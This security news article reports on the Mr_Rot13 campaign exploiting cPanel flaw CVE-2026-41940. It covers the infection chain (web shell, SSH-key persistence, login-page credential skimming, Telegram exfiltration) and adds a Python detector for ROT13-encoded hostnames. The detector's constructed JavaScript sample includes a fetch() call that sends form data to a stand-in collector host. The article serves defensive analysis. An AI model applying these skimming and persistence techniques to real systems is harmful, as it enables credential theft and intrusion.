
A threat actor named Mr_Rot13 is believed to have exploited a recently revealed critical flaw in cPanel to deploy a backdoor codenamed Filemanager into compromised environments.
This attack exploits vulnerability CVE-2026-41940, which affects cPanel and WebHost Manager (WHM), resulting in an authentication bypass that could allow a remote attacker to gain advanced control of the control panel.
According to a new report from QiAnXin XLab, this security flaw has been exploited by many attackers since its disclosure late last month, resulting in malicious behavior such as cryptocurrency mining, ransomware, botnet propagation, and backdoor implantation.
“Surveillance data shows that over 2,000 source IPs worldwide are currently involved in automated attacks and cybercriminal activity targeting this vulnerability,” said XLab researchers. “These IPs are distributed across multiple regions around the world, primarily originating from regions such as Germany, the United States, Brazil, and the Netherlands.”
Further analysis of the ongoing exploitation activity revealed that the Go-based infector, served from a remote server (‘cp.dene.[de[.]com’), is designed to drop a PHP web shell that facilitates file upload/download and remote command execution, and to embed an SSH public key into the compromised cPanel system for persistent access.
The web shell is then used to inject JavaScript code that serves a customized login page to steal credentials, which are siphoned off to an attacker-controlled system whose domain is stored encoded with the ROT13 cipher (‘wrned[.]…’). Once the details are submitted, the attack chain culminates in the deployment of a cross-platform backdoor that can infect Windows, macOS, and Linux systems.
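The ROT13-encoded exfiltration domain is a cheap obfuscation, and it is also a usable detection hook: a string literal that is not a hostname as written but becomes one under ROT13 stands out in injected page JavaScript. The triage helper below is an added example for this article, not code from XLab or the attackers; the JavaScript sample and the hostname inside it are constructed for the demonstration and are not indicators from the report.

```python
import codecs
import re

# Constructed sample shaped like injected login-page JavaScript that posts form data
# to a host kept as a ROT13 string literal. The hostname is invented for this example.
SAMPLE_JS = """
var f = document.getElementById('login_form');
var host = 'rknzcyr-pbyyrpgbe.pbz';  /* ROT13 of example-collector.com */
f.addEventListener('submit', function () {
  fetch('https://' + host + '/c', {method: 'POST'});
});
var label = 'Log in';
"""

# Single- or double-quoted JS string literals, honouring backslash escapes.
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
# Rough hostname shape: dotted labels of letters/digits/hyphens, alphabetic last label.
HOSTNAME = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)
# Small illustrative set of real TLDs; extend from a full public-suffix list in practice.
TLDS = {"com", "net", "org", "de", "io", "ru", "xyz", "top", "info"}


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one function both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def looks_like_hostname(text: str) -> bool:
    """True when text has hostname shape and ends in a known TLD."""
    return bool(HOSTNAME.match(text)) and text.rsplit(".", 1)[1].lower() in TLDS


def find_rot13_hostnames(js_source: str) -> list[tuple[str, str]]:
    """Return (literal, decoded) pairs for string literals that are not a hostname
    as written but decode to one under ROT13, the obfuscation this campaign used."""
    hits = []
    for match in STRING_LITERAL.finditer(js_source):
        literal = match.group(2)
        if looks_like_hostname(literal):
            continue  # plaintext hostname, not what this check is for
        decoded = rot13(literal)
        if looks_like_hostname(decoded):
            hits.append((literal, decoded))
    return hits


if __name__ == "__main__":
    for literal, decoded in find_rot13_hostnames(SAMPLE_JS):
        print(f"ROT13 hostname literal: {literal!r} -> {decoded}")
```

Run it over the JavaScript served by a cPanel login page you suspect has been modified; a hit gives the decoded domain to pivot on in proxy and DNS logs.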
The infector also has the ability to collect sensitive information from compromised hosts, including bash history, SSH data, device information, database passwords, and cPanel virtual aliases (also known as valiases), and to exfiltrate it to a three-member Telegram group created by a user named “0xWR.”
In the infection sequence analyzed by XLab, the Filemanager backdoor is delivered via a shell script downloaded from the ‘wpsock’.[.]com’ domain. The backdoor supports file management, remote command execution, and shell functionality.
There are indications that the threat actors behind this operation have been operating quietly in the shadows for years. This assessment is based on the fact that a command and control (C2) domain embedded in the JavaScript code is used in a PHP-based backdoor (“helper.php”) uploaded to the VirusTotal platform in April 2022. This domain was first registered in October 2020.
“For six years from 2020 to date, the detection rate of Mr_Rot13’s related samples and infrastructure across security products remains extremely low,” XLab said.
